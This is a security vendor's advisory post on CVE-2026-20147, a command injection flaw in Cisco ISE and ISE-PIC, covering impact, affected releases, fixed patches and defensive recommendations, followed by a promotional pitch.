What is CVE-2026-20147?
CVE-2026-20147 is a remote code execution vulnerability in Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC). The flaw is insufficient validation of user-supplied input in the web management interface.
An authenticated attacker with valid administrative credentials can send a crafted HTTP request that breaks out of the application context and executes arbitrary commands on the underlying operating system.
The vulnerability carries a CVSS v3.1 base score of 9.9 (Critical), as assigned in the Cisco PSIRT advisory. Exploitation is authenticated but network-based. Cisco's advisory notes that a successful exploit grants initial user-level shell access followed by privilege escalation to root. The vulnerability is classified under CWE-77, Improper Neutralization of Special Elements used in a Command.
The practical impact goes beyond a single compromised ISE node. ISE is the control plane for network access in the environments where it is deployed. Root on an ISE appliance lets an attacker modify authentication and authorization policy, issue or revoke endpoint access, and pivot using trust relationships ISE holds with the rest of the network.
In single-node deployments, Cisco warns the exploit can render ISE unavailable, blocking any endpoints that have not already authenticated from reaching the network until the node is restored.
What assets are affected by CVE-2026-20147?
The vulnerability affects Cisco ISE and ISE-PIC regardless of device configuration. All releases prior to the April 2026 patches are vulnerable.
Releases earlier than 3.1 have no fix and must be migrated to a supported branch. ISE-PIC has reached end-of-sale, and 3.4 is its last supported release.
An affected asset is an ISE or ISE-PIC admin web interface, typically reachable on TCP/443 of the Policy Administration Node. These interfaces belong on a management network. In practice they often get exposed to broader internal zones, and sometimes to the public internet through VPN concentrators, jump hosts, or legacy guest-access setups. Root on an ISE box means control of the identity layer, so an exposed admin console is a higher-stakes finding than most management-plane issues.
Are fixes available?
Yes. Cisco released software updates on April 15, 2026 that address this vulnerability alongside CVE-2026-20148, a related path traversal issue. Defenders should upgrade to the first fixed release for their branch: 3.1 Patch 11, 3.2 Patch 10, 3.3 Patch 11, 3.4 Patch 6, or 3.5 Patch 3. Customers running ISE or ISE-PIC on a branch earlier than 3.1 need to migrate, as no fix is being backported.
Cisco's advisory explicitly states there are no workarounds. Configuration changes cannot neutralize the flaw, and Cisco considers any interim mitigations to be temporary until an upgrade is applied.
Are there any other recommended actions to take?
Restrict administrative access to ISE and ISE-PIC management interfaces to a hardened management network. Block internet reachability to the admin console wherever it currently exists.
Enforce MFA on all ISE admin roles, and review authentication logs for unexpected admin sessions during the window before patching.
Monitor ISE nodes for unexpected child processes spawned by the web service user, and treat any anomalous outbound traffic from an ISE appliance as a high-severity signal.
How can CyCognito help your organization?
CyCognito published an Emerging Threat Advisory for CVE-2026-20147 in the CyCognito platform and is actively researching enhanced detection capabilities for this vulnerability.
To learn how CyCognito can help your organization reduce external exposure and manage emerging threats more effectively, contact us to request a demo.
